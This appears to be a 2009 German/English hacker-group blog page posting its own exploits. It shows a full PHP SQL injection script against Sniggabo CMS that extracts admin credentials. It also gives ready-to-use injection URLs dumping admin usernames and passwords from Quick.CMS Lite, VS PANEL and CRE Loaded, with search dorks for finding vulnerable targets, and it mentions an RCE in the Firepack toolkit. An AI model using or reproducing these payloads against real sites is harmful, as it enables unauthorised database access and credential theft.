. [ Show ] in English
This time only a small exploit.
Dieses Mal ist es bei einem recht kleinen Exploit geblieben:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| <?php
print_r('
################################################
Sniggabo CMS - Remote SQL Injection Exploit
Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Homepage: http://www.novusec.com
Greetz to: -=Player=- , Suicide, enco,
Palme, GPM, karamble, Free-Hack
Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id
Use: php '.$argv[0].' http://www.site.com
################################################
');
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
$data = split("::",$src);
echo "Admin: $data[1]\nPassword: $data[2]\n";
?>
# milw0rm.com [2009-06-11] |
Lidloses_Auge Exploits, SQL Injections
Email an str0ke ist heute (21.04.09 – 17:10Uhr) rausgegangen.
[+]————————————-[+]
[+] Homepage: http://opensolution.org/
[+] Product: Quick.CMS Lite 0.5
[+] File: index.php
[+] Parameter: id
[+] Dork: “Powered by Quick.Cms”
[+]————————————-[+]
[+] SQL Injection:
[+] index.php?t=ph&id=null’+union+select+
[+] unhex(hex(concat_ws(0×203a20,id,litera,haslo,0×3c62723e3c62723e)))
[+] +from+sennik–+
[+]————————————-[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]————————————-[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]————————————-[+]
Player Exploits, SQL Injections
Email an str0ke ist heute (21.04.09 – 16:30Uhr) rausgegangen.
[+]————————————-[+]
[+] Homepage: http://www.vspanel.gr/
[+] Product: VS PANEL v.7.3.6
[+] File: showcat.php
[+] Parameter: Cat_ID
[+] Dork: “Powered by VS PANEL”
[+]————————————-[+]
[+] SQL Injection:
[+]showcat.php?Cat_ID=null+union+select+1,concat_ws(0×203a20,name,password)+from+Users–
[+]————————————-[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]————————————-[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]————————————-[+]
Player Exploits, SQL Injections
Email an str0ke ist heute (21.04.09 – 14:30Uhr) rausgegangen.
[+]————————————-[+]
[+] Homepage : http://www.creloaded.com/
[+] Product : CRE Loaded v6.2
[+] File : product_info.php
[+] Parameter : product_id
[+]————————————-[+]
[+] SQL Injection:
[+]product_info.php?products_id=-1+union+select+1,concat_ws(0×203a20,admin_email_address,admin_password)+from+admin–
[+]————————————-[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]————————————-[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]————————————-[+]
Player Exploits
. [ Show ] in English
Firepack – remote code/command execution exploit
I called it “hack the hacker” – my plan was to exploit a toolkit, which has been coded for exploiting.
Thought of it for a while, and then i took the next toolkit i could find and began.
The result was a remote code/command execution, which was very easy to find, but the coder didn’t notice.
There is many more stuff, that can be used in a similar way, but first of all the exploit.
URL of exploit
“Hack the hacker” nannte ich mein ironisches Vorhaben, ein Toolkit zu exploiten, welches zu selbigem gedacht ist. Ich machte mir bereits vorher Gedanken, ein solches Vorhaben durchzuführen, habe mir dann das nächstbeste Toolkit geschnappt und einmal drüber geschaut.
Das Ergebnis war eine Remote Code/Command Execution, die dem Coder durchaus hätte auffallen müssen.
Es gibt noch viel ähnliches Material, was sich dementsprechend verarbeiten ließe, hier aber erstmal das Exploit:
Link zum Exploit
Lidloses_Auge Exploits, SQL Injections
